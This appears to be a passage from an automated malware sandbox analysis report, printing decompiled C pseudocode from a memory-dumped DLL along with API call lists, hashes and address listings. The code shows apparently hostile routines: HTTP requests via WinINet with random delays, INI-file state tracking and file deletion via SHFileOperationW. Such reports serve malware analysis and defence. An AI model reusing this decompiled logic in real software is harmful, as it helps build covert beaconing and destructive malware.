                                                                                                        0x70985cf8
                                                                                                        0x70985cfc
                                                                                                        0x70985cff
                                                                                                        0x70985d14
                                                                                                        0x70985d23
                                                                                                        0x70985d27
                                                                                                        0x70985d2c
                                                                                                        0x70985d33
                                                                                                        0x70985d35
                                                                                                        0x70985d35
                                                                                                        0x00000000
                                                                                                        0x70985d33
                                                                                                        0x70985d07
                                                                                                        0x70985d0c
                                                                                                        0x70985d12
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985d12
                                                                                                        0x70985ceb
                                                                                                        0x70985cf0
                                                                                                        0x70985cf6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985cf6
                                                                                                        0x70985ccf
                                                                                                        0x70985cd4
                                                                                                        0x70985cda
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70985cda

                                                                                                        APIs
                                                                                                        • GetTickCount.KERNEL32 ref: 70985A61
                                                                                                        • InternetOpenW.WININET(00B64190,00000001,00000000,00000000,00000000), ref: 70985A93
                                                                                                        • InternetSetOptionW.WININET ref: 70985ABF
                                                                                                        • InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 70985ACB
                                                                                                        • InternetSetOptionW.WININET(00000000,00000006,?,00000004), ref: 70985AD7
                                                                                                        • InternetConnectW.WININET(00000000,?,-00000050,00000000,00000000,00000003,00000000,00000000), ref: 70985AF9
                                                                                                        • StrChrW.SHLWAPI(7098CD54,00000048,00000000,00000000,84AA3300,00000000), ref: 70985B21
                                                                                                        • StrChrW.SHLWAPI(7098CD48,00000050,00000001,00000000), ref: 70985B2F
                                                                                                        • HttpOpenRequestW.WININET(00000000,00000000), ref: 70985B33
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001000), ref: 70985B4A
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70985B51
                                                                                                        • StrChrW.SHLWAPI(7098CD1C,00000043), ref: 70985B68
                                                                                                        • StrChrW.SHLWAPI(7098C564,00000025,00000000), ref: 70985B72
                                                                                                        • wsprintfW.USER32 ref: 70985B76
                                                                                                        • HttpAddRequestHeadersW.WININET(00000000,00000000,00000000,A0000000), ref: 70985B87
                                                                                                        • GetTickCount.KERNEL32 ref: 70985B9B
                                                                                                        • RtlRandom.NTDLL ref: 70985BAA
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985BBB
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985BC2
                                                                                                        • StrChrA.SHLWAPI(7098CCA0,0000002D,?,?,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985BE7
                                                                                                        • wsprintfA.USER32 ref: 70985BEF
                                                                                                        • StrChrA.SHLWAPI(7098CC88,0000002D,?), ref: 70985C0E
                                                                                                        • wsprintfA.USER32 ref: 70985C1A
                                                                                                        • StrChrW.SHLWAPI(7098CC58,00000043,?), ref: 70985C40
                                                                                                        • wsprintfW.USER32 ref: 70985C48
                                                                                                        • HttpAddRequestHeadersW.WININET(00000000,00000000,00000000,A0000000), ref: 70985C59
                                                                                                        • StrChrW.SHLWAPI(7098CBE0,00000043,?), ref: 70985C6B
                                                                                                        • wsprintfW.USER32 ref: 70985C73
                                                                                                        • HttpAddRequestHeadersW.WININET(00000000,00000000,00000000,A0000000), ref: 70985C84
                                                                                                        • HttpSendRequestExW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 70985C93
                                                                                                        • HttpEndRequestW.WININET(00000000,00000000,00000000,00000000), ref: 70985D44
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D69
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D70
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D79
                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985D80
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985D8B
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985D96
                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 70985D9D
                                                                                                        • GetTickCount.KERNEL32 ref: 70985DAE
                                                                                                        • Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985DBD
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,709879B7,?,7098CDD4), ref: 70985DC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: HeapInternet$HttpRequest$wsprintf$Process$CloseCountHandleHeadersOptionTick$AllocFreeOpen$ConnectErrorLastRandomSendSleep
                                                                                                        • String ID: N
                                                                                                        • API String ID: 2546452625-1161386698
                                                                                                        • Opcode ID: 321ec050df4079f926fdfa2280ae335633a7ae2c1dfc872633eb210d30e402ed
                                                                                                        • Instruction ID: 88841764c68fdaf19a6fad5b7c325c1c999d981032fe82be9987fcf4e79939d1
                                                                                                        • Opcode Fuzzy Hash: 321ec050df4079f926fdfa2280ae335633a7ae2c1dfc872633eb210d30e402ed
                                                                                                        • Instruction Fuzzy Hash: E4B17CB2518300BFD3009F61CC89F6F7BA8EB88B45F604529FA46A63D1D774E9058B66
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 709847A0, Relevance: 46.8, APIs: 31, Instructions: 257memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 66%
                                                                                                        			E709847A0(void* __ebx, void* __edi) {
				WCHAR* _t39;
				int _t40;
				WCHAR* _t44;
				intOrPtr _t48;
				void* _t51;
				WCHAR* _t60;
				void* _t65;
				WCHAR* _t70;
				WCHAR* _t72;
				WCHAR* _t79;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				WCHAR* _t88;
				signed int _t89;
				WCHAR* _t99;
				WCHAR* _t100;
				WCHAR* _t101;
				WCHAR* _t104;
				intOrPtr _t105;
				WCHAR* _t110;
				WCHAR* _t111;
				void* _t113;
				void* _t114;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t119;
				WCHAR* _t122;
				WCHAR* _t124;
				void* _t125;
				void* _t126;
				void* _t128;
				void* _t129;

				_t113 = __edi;
				_t85 = __ebx;
				 *(_t125 + 0xc) = 0;
				if( *0x7098f5f4 == 0) {
					L23:
					return  *(_t125 + 0xc);
				} else {
					_t39 =  *0x7098f57c; // 0xb7ea60
					_t88 =  *0x7098f588; // 0x79a25c
					_t104 =  *0x7098f58c; // 0x7837d8
					_t40 = GetPrivateProfileIntW(_t104, _t88, 0, _t39);
					_t116 =  *((intOrPtr*)(_t125 + 0x38));
					if(_t116 != 0 || _t40 != 0) {
						if( *((intOrPtr*)(_t125 + 0x3c)) != 0) {
							goto L7;
						} else {
							_t83 =  *0x7098f588; // 0x79a25c
							_t84 = E709839F0(_t83, 0, 0, 1);
							_t125 = _t125 + 0x10;
							if(_t84 == (0 | _t116 == 0x00000000)) {
								goto L7;
							}
						}
						goto L23;
					} else {
						if( *((intOrPtr*)(_t125 + 0x3c)) != _t40) {
							L7:
							_push(_t113);
							_t114 = HeapAlloc(GetProcessHeap(), 8, 0x1000);
							if(_t114 != 0) {
								_push(_t85);
								_push(StrChrW(0x7098ca24, 0x2e));
								_t44 = StrChrW(0x7098ca18, 0x76);
								_t105 =  *0x7098f5cc; // 0xb757b8
								_push(_t44);
								_push(_t105);
								wsprintfW(_t114, StrChrW(0x7098ca08, 0x25));
								_t126 = _t125 + 0x14;
								_push(0x5c);
								_t7 = _t114 + 0x402; // 0x402
								_t122 = _t7;
								_push(StrChrW(0x7098ca18, 0x76));
								_t48 =  *0x7098f5cc; // 0xb757b8
								_push(_t48);
								 *((intOrPtr*)(_t126 + 0x3c)) = wsprintfW(_t122, StrChrW(0x7098c9f4, 0x25));
								_t51 = E70982EC0(_t114, _t122, 0);
								_t125 = _t126 + 0x20;
								if(_t51 != 0) {
									_t89 =  *0x7098f59c; // 0x1
									asm("sbb ecx, ecx");
									_push(0x5c);
									_push(( ~_t89 & 0xffffffea) + 0x56);
									_push(_t122);
									wsprintfW(_t114, StrChrW(0x7098c9e4, 0x25));
									_t9 = _t114 + 0xc04; // 0xc04
									_t124 = _t9;
									_push(StrChrW(0x7098c9d8, 0x2e));
									_push(StrChrW(0x7098c9c4, 0x69));
									_push(_t114);
									_t11 = wsprintfW(_t124, StrChrW(0x7098ca08, 0x25)) * 2; // 0xc06
									_t60 =  *0x7098f588; // 0x79a25c
									_t128 = _t125 + 0x28;
									 *((intOrPtr*)(_t128 + 0x10)) = _t124 + _t11 + 2;
									_push(_t60);
									if( *((intOrPtr*)(_t128 + 0x44)) == 0) {
										_push(StrChrW(0x7098c988, 0x72));
										wsprintfW( *(_t128 + 0x18), StrChrW(0x7098c978, 0x25));
										_t129 = _t128 + 0x10;
									} else {
										_t79 = StrChrW(0x7098c9b8, 0x2e);
										_t101 =  *0x7098f588; // 0x79a25c
										_push(_t79);
										_push(_t101);
										_push(_t114);
										_push(StrChrW(0x7098c9c4, 0x69));
										wsprintfW( *(_t128 + 0x24), StrChrW(0x7098c998, 0x25));
										_t129 = _t128 + 0x1c;
									}
									_push(_t129 + 0x14);
									_push(0x1e);
									_push(0);
									 *(_t129 + 0x2c) = 0;
									_t65 = E709844E0(0, _t124,  *((intOrPtr*)(_t129 + 0x10)));
									_t125 = _t129 + 0x18;
									if(_t65 != 0) {
										if(E709845B0() != 0) {
											_t100 =  *0x7098f588; // 0x79a25c
											_push(_t100);
											_push(StrChrW(0x7098c964, 0x72));
											wsprintfW( *(_t125 + 0x18), StrChrW(0x7098c978, 0x25));
											_push(0);
											_push(0x1e);
											_push(0);
											E709844E0(0, _t124,  *(_t125 + 0x18));
											_t125 = _t125 + 0x28;
										}
										_t119 =  *((intOrPtr*)(_t125 + 0x44));
										if(_t119 == 0) {
											_t70 =  *0x7098f588; // 0x79a25c
											E70983850(_t70, 1);
											_t125 = _t125 + 8;
										} else {
											_t111 =  *0x7098f588; // 0x79a25c
											E709839F0(_t111, 0, 0, 0);
											_t125 = _t125 + 0x10;
										}
										if( *((intOrPtr*)(_t125 + 0x14)) == 0) {
											_t124[1] = 0;
											 *_t124 = (0 | _t119 != 0x00000000) + 0x30;
											_t72 =  *0x7098f57c; // 0xb7ea60
											_t99 =  *0x7098f588; // 0x79a25c
											_t110 =  *0x7098f58c; // 0x7837d8
											WritePrivateProfileStringW(_t110, _t99, _t124, _t72);
											 *(_t125 + 0x18) = 1;
										}
									}
									_t28 = _t114 + 0x402; // 0x402
									_t118 = _t28;
									 *((intOrPtr*)(_t118 +  *(_t125 + 0x1c) * 2 - 2)) = 0;
									_push(0x1e);
									_push(_t125 + 0x24);
									L7098BF02();
									 *((intOrPtr*)(_t125 + 0x28)) = 3;
									 *((intOrPtr*)(_t125 + 0x2c)) = _t118;
									 *((short*)(_t125 + 0x34)) = 0x614;
									SHFileOperationW(_t125 + 0x20);
								}
								HeapFree(GetProcessHeap(), 0, _t114);
							}
							goto L23;
						} else {
							return _t40;
						}
					}
				}
			}




































                                                                                                        0x709847a0
                                                                                                        0x709847a0
                                                                                                        0x709847ab
                                                                                                        0x709847b3
                                                                                                        0x70984a82
                                                                                                        0x70984a8a
                                                                                                        0x709847b9
                                                                                                        0x709847b9
                                                                                                        0x709847be
                                                                                                        0x709847c4
                                                                                                        0x709847cf
                                                                                                        0x709847d5
                                                                                                        0x709847db
                                                                                                        0x709847f1
                                                                                                        0x00000000
                                                                                                        0x709847f3
                                                                                                        0x709847f3
                                                                                                        0x709847ff
                                                                                                        0x70984806
                                                                                                        0x70984810
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x70984810
                                                                                                        0x00000000
                                                                                                        0x709847e1
                                                                                                        0x709847e5
                                                                                                        0x70984816
                                                                                                        0x70984816
                                                                                                        0x7098482b
                                                                                                        0x7098482f
                                                                                                        0x7098483b
                                                                                                        0x70984846
                                                                                                        0x7098484e
                                                                                                        0x70984850
                                                                                                        0x70984856
                                                                                                        0x70984857
                                                                                                        0x70984869
                                                                                                        0x7098486b
                                                                                                        0x7098486e
                                                                                                        0x70984877
                                                                                                        0x70984877
                                                                                                        0x7098487f
                                                                                                        0x70984880
                                                                                                        0x70984885
                                                                                                        0x70984897
                                                                                                        0x7098489b
                                                                                                        0x709848a0
                                                                                                        0x709848a5
                                                                                                        0x709848ab
                                                                                                        0x709848b3
                                                                                                        0x709848b5
                                                                                                        0x709848bd
                                                                                                        0x709848be
                                                                                                        0x709848ca
                                                                                                        0x709848d6
                                                                                                        0x709848d6
                                                                                                        0x709848de
                                                                                                        0x709848e8
                                                                                                        0x709848e9
                                                                                                        0x709848f7
                                                                                                        0x709848fb
                                                                                                        0x70984900
                                                                                                        0x70984908
                                                                                                        0x7098490c
                                                                                                        0x7098490d
                                                                                                        0x7098494a
                                                                                                        0x7098495a
                                                                                                        0x7098495c
                                                                                                        0x7098490f
                                                                                                        0x70984916
                                                                                                        0x70984918
                                                                                                        0x7098491e
                                                                                                        0x7098491f
                                                                                                        0x70984920
                                                                                                        0x7098492a
                                                                                                        0x7098493a
                                                                                                        0x7098493c
                                                                                                        0x7098493c
                                                                                                        0x70984967
                                                                                                        0x70984968
                                                                                                        0x7098496a
                                                                                                        0x70984970
                                                                                                        0x70984978
                                                                                                        0x7098497d
                                                                                                        0x70984982
                                                                                                        0x7098498f
                                                                                                        0x70984991
                                                                                                        0x70984997
                                                                                                        0x709849a1
                                                                                                        0x709849b1
                                                                                                        0x709849b3
                                                                                                        0x709849b5
                                                                                                        0x709849b7
                                                                                                        0x709849bd
                                                                                                        0x709849c2
                                                                                                        0x709849c2
                                                                                                        0x709849c5
                                                                                                        0x709849cb
                                                                                                        0x709849e4
                                                                                                        0x709849ec
                                                                                                        0x709849f1
                                                                                                        0x709849cd
                                                                                                        0x709849cd
                                                                                                        0x709849da
                                                                                                        0x709849df
                                                                                                        0x709849df
                                                                                                        0x709849f9
                                                                                                        0x70984a04
                                                                                                        0x70984a0b
                                                                                                        0x70984a0f
                                                                                                        0x70984a14
                                                                                                        0x70984a1a
                                                                                                        0x70984a24
                                                                                                        0x70984a2a
                                                                                                        0x70984a2a
                                                                                                        0x709849f9
                                                                                                        0x70984a38
                                                                                                        0x70984a38
                                                                                                        0x70984a3e
                                                                                                        0x70984a42
                                                                                                        0x70984a48
                                                                                                        0x70984a49
                                                                                                        0x70984a58
                                                                                                        0x70984a60
                                                                                                        0x70984a64
                                                                                                        0x70984a69
                                                                                                        0x70984a69
                                                                                                        0x70984a79
                                                                                                        0x70984a80
                                                                                                        0x00000000
                                                                                                        0x709847eb
                                                                                                        0x709847eb
                                                                                                        0x709847eb
                                                                                                        0x709847e5
                                                                                                        0x709847db

                                                                                                        APIs
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 709847CF
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001000), ref: 7098481E
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70984825
                                                                                                        • StrChrW.SHLWAPI(7098CA24,0000002E), ref: 70984844
                                                                                                        • StrChrW.SHLWAPI(7098CA18,00000076,00000000), ref: 7098484E
                                                                                                        • StrChrW.SHLWAPI(7098CA08,00000025,00B757B8,00000000), ref: 7098485F
                                                                                                        • wsprintfW.USER32 ref: 70984869
                                                                                                        • StrChrW.SHLWAPI(7098CA18,00000076,0000005C), ref: 7098487D
                                                                                                        • StrChrW.SHLWAPI(7098C9F4,00000025,00B757B8,00000000), ref: 7098488D
                                                                                                        • wsprintfW.USER32 ref: 70984891
                                                                                                        • StrChrW.SHLWAPI(7098C9E4,00000025,00000402,-00000055,0000005C), ref: 709848C6
                                                                                                        • wsprintfW.USER32 ref: 709848CA
                                                                                                        • StrChrW.SHLWAPI(7098C9D8,0000002E), ref: 709848DC
                                                                                                        • StrChrW.SHLWAPI(7098C9C4,00000069,00000000), ref: 709848E6
                                                                                                        • StrChrW.SHLWAPI(7098CA08,00000025,00000000,00000000), ref: 709848F1
                                                                                                        • wsprintfW.USER32 ref: 709848F5
                                                                                                        • StrChrW.SHLWAPI(7098C9B8,0000002E,0079A25C), ref: 70984916
                                                                                                        • StrChrW.SHLWAPI(7098C9C4,00000069,00000000,0079A25C,00000000), ref: 70984928
                                                                                                        • StrChrW.SHLWAPI(7098C998,00000025,00000000), ref: 70984932
                                                                                                        • wsprintfW.USER32 ref: 7098493A
                                                                                                        • StrChrW.SHLWAPI(7098C988,00000072,0079A25C), ref: 70984948
                                                                                                        • StrChrW.SHLWAPI(7098C978,00000025,00000000), ref: 70984952
                                                                                                        • wsprintfW.USER32 ref: 7098495A
                                                                                                        • StrChrW.SHLWAPI(7098C964,00000072,0079A25C,?,00000C04,?,00000000,0000001E,?), ref: 7098499F
                                                                                                        • StrChrW.SHLWAPI(7098C978,00000025,00000000,?,00000C04,?,00000000,0000001E,?), ref: 709849A9
                                                                                                        • wsprintfW.USER32 ref: 709849B1
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,0079A25C,00000C04,00B7EA60), ref: 70984A24
                                                                                                        • RtlZeroMemory.NTDLL(?,0000001E), ref: 70984A49
                                                                                                        • SHFileOperationW.SHELL32 ref: 70984A69
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 70984A72
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70984A79
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.295278453.0000000070981000.00000020.00020000.sdmp, Offset: 70980000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.295270689.0000000070980000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295300046.000000007098C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295309106.000000007098F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.295316230.0000000070990000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wsprintf$Heap$PrivateProcessProfile$AllocFileFreeMemoryOperationStringWriteZero
                                                                                                        • String ID:
                                                                                                        • API String ID: 39017707-0
                                                                                                        • Opcode ID: 804d7e2958602645f43667fedf283efae4aea711da20786eda058d0fb377f820
                                                                                                        • Instruction ID: 075d46cbb2a11a3b35c8fb8a072b0b50312e98b77ebec7dd173b49f80c8bfc50
                                                                                                        • Opcode Fuzzy Hash: 804d7e2958602645f43667fedf283efae4aea711da20786eda058d0fb377f820
                                                                                                        • Instruction Fuzzy Hash: A081C8B2A543047FE2149B65CC4AF7F76ACDF88B44F104519FE459A3D0E7B5A8008BA7
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 70986F50, Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E70986F50() {
				void* _t50;
				WCHAR* _t60;
				WCHAR* _t61;
				WCHAR* _t66;
				WCHAR* _t67;
				WCHAR* _t73;
				int _t77;
				WCHAR* _t81;
				WCHAR* _t82;
				WCHAR* _t86;
				int _t87;
				void* _t89;
				void* _t91;
				WCHAR* _t92;
				void* _t94;
				short _t99;
				WCHAR* _t101;
				WCHAR* _t102;
				WCHAR* _t105;
				WCHAR* _t107;
				WCHAR* _t108;
				WCHAR* _t110;
				WCHAR* _t111;
				WCHAR* _t115;
				WCHAR* _t116;
				WCHAR* _t123;
				WCHAR* _t128;
				int _t129;
				WCHAR* _t132;
				WCHAR* _t139;
				long _t140;
				long _t141;
				signed int _t145;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;

				_t145 =  *(_t152 + 0x228);
				if(_t145 != 0) {
					_t94 =  *(_t145 + 4);
					if(_t94 != 0) {
						HeapFree(GetProcessHeap(), 0, _t94);
					}
					_t50 =  *(_t145 + 8);
					if(_t50 != 0) {
						_t50 = HeapFree(GetProcessHeap(), 0, _t50);
					}
				}
				if( *((intOrPtr*)(_t152 + 0x230)) != 0) {
					return _t50;
				} else {
					if(_t145 == 0) {
						_t92 =  *0x7098f57c; // 0xb7ea60
						 *((short*)(_t152 + 0x24)) = 0;
						_t139 =  *0x7098f58c; // 0x7837d8
						 *((intOrPtr*)(_t152 + 0x28)) = 0x640067;
						WritePrivateProfileStringW(_t139, _t152 + 0x20, 0, _t92);
					}
					 *((short*)(_t152 + 0x12)) = 0;
					asm("sbb eax, eax");
					_t99 = ( ~_t145 & 0xfffffff5) + 0x0000006e & 0x0000ffff;
					 *((intOrPtr*)(_t152 + 0x14)) = 0x640068;
					 *(_t152 + 0x18) = _t99;
					E70981DC0(0x7098f050);
					_t101 =  *0x7098f57c; // 0xb7ea60
					_t153 = _t152 + 4;
					_t102 =  *0x7098f58c; // 0x7837d8
					_t140 = GetPrivateProfileStringW(_t102, _t153 + 0x20, 0x7098f050, _t153 + 0x2c, 0x104, _t101);
					E70981DC0(0x7098f050);
					_t154 = _t153 + 4;
					if(_t145 == 0) {
						_t60 =  *0x7098f57c; // 0xb7ea60
						_t61 =  *0x7098f58c; // 0x7837d8
						 *(_t154 + 0x18) = 0x63;
						WritePrivateProfileStringW(_t61, _t154 + 0x18, _t154 + 0x28, _t60);
						_t123 =  *0x7098f57c; // 0xb7ea60
						 *((short*)(_t154 + 0x1c)) = 0x6e;
						_t105 =  *0x7098f58c; // 0x7837d8
						WritePrivateProfileStringW(_t105, _t154 + 0x18, 0, _t123);
					} else {
						_t14 = _t140 + _t140 + 2; // 0x74b397f2
						_t91 = HeapAlloc(GetProcessHeap(), 8, _t14);
						 *(_t145 + 4) = _t91;
						RtlMoveMemory(_t91, _t154 + 0x28, _t140 + _t140);
						 *_t145 = _t140;
					}
					 *((short*)(_t154 + 0x16)) = 0x70;
					 *(_t154 + 0x18) = _t99;
					E70981DC0(0x7098f008);
					_t66 =  *0x7098f57c; // 0xb7ea60
					_t155 = _t154 + 4;
					_t67 =  *0x7098f58c; // 0x7837d8
					_t141 = GetPrivateProfileStringW(_t67, _t155 + 0x20, 0x7098f008, _t155 + 0x2c, 0x104, _t66);
					E70981DC0(0x7098f008);
					_t156 = _t155 + 4;
					if(_t145 == 0) {
						_t107 =  *0x7098f57c; // 0xb7ea60
						_t108 =  *0x7098f58c; // 0x7837d8
						 *(_t156 + 0x18) = 0x63;
						WritePrivateProfileStringW(_t108, _t156 + 0x18, _t156 + 0x28, _t107);
						_t73 =  *0x7098f57c; // 0xb7ea60
						 *((short*)(_t156 + 0x1c)) = 0x6e;
						_t128 =  *0x7098f58c; // 0x7837d8
						WritePrivateProfileStringW(_t128, _t156 + 0x18, 0, _t73);
					} else {
						_t26 = _t141 + _t141 + 2; // 0x2
						_t89 = HeapAlloc(GetProcessHeap(), 8, _t26);
						 *(_t145 + 8) = _t89;
						RtlMoveMemory(_t89, _t156 + 0x28, _t141 + _t141);
					}
					_t110 =  *0x7098f57c; // 0xb7ea60
					_t129 =  *0x7098f004; // 0x1
					_t111 =  *0x7098f58c; // 0x7837d8
					 *((short*)(_t156 + 0x16)) = 0x73;
					 *(_t156 + 0x24) = _t99;
					_t77 = GetPrivateProfileIntW(_t111, _t156 + 0x18, _t129, _t110);
					if(_t145 != 0) {
						 *((intOrPtr*)(_t156 + 0xe)) = 0x74;
						 *(_t145 + 0xc) = 0 | _t77 != 0x00000000;
						_t116 =  *0x7098f57c; // 0xb7ea60
						_t86 =  *0x7098f58c; // 0x7837d8
						_t87 = GetPrivateProfileIntW(_t86, _t156 + 0x14, 0xc, _t116);
						 *(_t145 + 0x10) = _t87;
						return _t87;
					}
					asm("sbb eax, eax");
					 *(_t156 + 0x14) =  ~(_t77 - 1) + 0x31;
					_t81 =  *0x7098f57c; // 0xb7ea60
					_t82 =  *0x7098f58c; // 0x7837d8
					 *((short*)(_t156 + 0x1a)) = 0;
					 *(_t156 + 0x14) = 0x63;
					WritePrivateProfileStringW(_t82, _t156 + 0x14, _t156 + 0x18, _t81);
					_t132 =  *0x7098f57c; // 0xb7ea60
					 *(_t156 + 0x18) = 0x6e;
					_t115 =  *0x7098f58c; // 0x7837d8
					return WritePrivateProfileStringW(_t115, _t156 + 0x14, 0, _t132);
				}
			}









































                                                                                                        0x70986f57
                                                                                                        0x70986f61
                                                                                                        0x70986f63
                                                                                                        0x70986f6e
                                                                                                        0x70986f7a
                                                                                                        0x70986f7a
                                                                                                        0x70986f7c
                                                                                                        0x70986f81
                                                                                                        0x70986f8d
                                                                                                        0x70986f8d
                                                                                                        0x70986f81
                                                                                                        0x70986f97
                                                                                                        0x709871d3
                                                                                                        0x70986f9d
                                                                                                        0x70986fa6
                                                                                                        0x70986fa8
                                                                                                        0x70986fb5
                                                                                                        0x70986fba
                                                                                                        0x70986fc2
                                                                                                        0x70986fca
                                                                                                        0x70986fca
                                                                                                        0x70986fce
                                                                                                        0x70986fd7
                                                                                                        0x70986fe0
                                                                                                        0x70986fe8
                                                                                                        0x70986ff0
                                                                                                        0x70986ff5
                                                                                                        0x70986ffa
                                                                                                        0x70987000
                                                                                                        0x70987004
                                                                                                        0x7098702a
                                                                                                        0x7098702c
                                                                                                        0x70987031
                                                                                                        0x70987036
                                                                                                        0x70987067
                                                                                                        0x7098706d
                                                                                                        0x7098707b
                                                                                                        0x70987087
                                                                                                        0x70987089
                                                                                                        0x7098709b
                                                                                                        0x709870a0
                                                                                                        0x709870a8
                                                                                                        0x70987038
                                                                                                        0x7098703b
                                                                                                        0x70987048
                                                                                                        0x70987055
                                                                                                        0x70987058
                                                                                                        0x70987063
                                                                                                        0x70987063
                                                                                                        0x709870b4
                                                                                                        0x709870b9
                                                                                                        0x709870be
                                                                                                        0x709870c3
                                                                                                        0x709870c8
                                                                                                        0x709870cc
                                                                                                        0x709870f1
                                                                                                        0x709870f3
                                                                                                        0x709870f8
                                                                                                        0x709870fd
                                                                                                        0x70987125
                                                                                                        0x7098712c
                                                                                                        0x7098713b
                                                                                                        0x70987147
                                                                                                        0x70987149
                                                                                                        0x7098715a
                                                                                                        0x7098715f
                                                                                                        0x70987167
                                                                                                        0x709870ff
                                                                                                        0x70987101
                                                                                                        0x7098710e
                                                                                                        0x7098711b
                                                                                                        0x7098711e
                                                                                                        0x7098711e
                                                                                                        0x70987169
                                                                                                        0x7098716f
                                                                                                        0x7098717c
                                                                                                        0x70987187
                                                                                                        0x70987193
                                                                                                        0x70987198
                                                                                                        0x7098719d
                                                                                                        0x709871a6
                                                                                                        0x709871ae
                                                                                                        0x709871b1
                                                                                                        0x709871b7
                                                                                                        0x709871c5
                                                                                                        0x709871c7
                                                                                                        0x00000000
                                                                                                        0x709871ca
                                                                                                        0x709871d9
                                                                                                        0x709871de
                                                                                                        0x709871e3
                                                                                                        0x709871e9
                                                                                                        0x709871ee
                                                                                                        0x709871fc
                                                                                                        0x70987208
                                                                                                        0x7098720a
                                                                                                        0x7098721c
                                                                                                        0x70987221
                                                                                                        0x70987234
                                                                                                        0x70987234

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000), ref: 70986F73
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70986F7A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000001,00000000,00000000), ref: 70986F86
                                                                                                        • HeapFree.KERNEL32(00000000), ref: 70986F8D
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00B7EA60), ref: 70986FCA
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 7098701F
                                                                                                        • GetProcessHeap.KERNEL32(00000008,74B397F2), ref: 70987041
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 70987048
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,74B397F0), ref: 70987058
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00B7EA60), ref: 70987087
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00B7EA60), ref: 709870A8
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 709870E6
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002), ref: 70987107
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 7098710E
                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,00000000), ref: 7098711E
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00B7EA60), ref: 70987147
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00B7EA60), ref: 70987167
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 70987198
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 709871C5
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,?,00B7EA60), ref: 70987208
                                                                                                        • WritePrivateProfileStringW.KERNEL32(007837D8,?,00000000,00B7EA60), ref: 70987229
                                                                                                        Strings
                                                                                                        Memory Dump Source
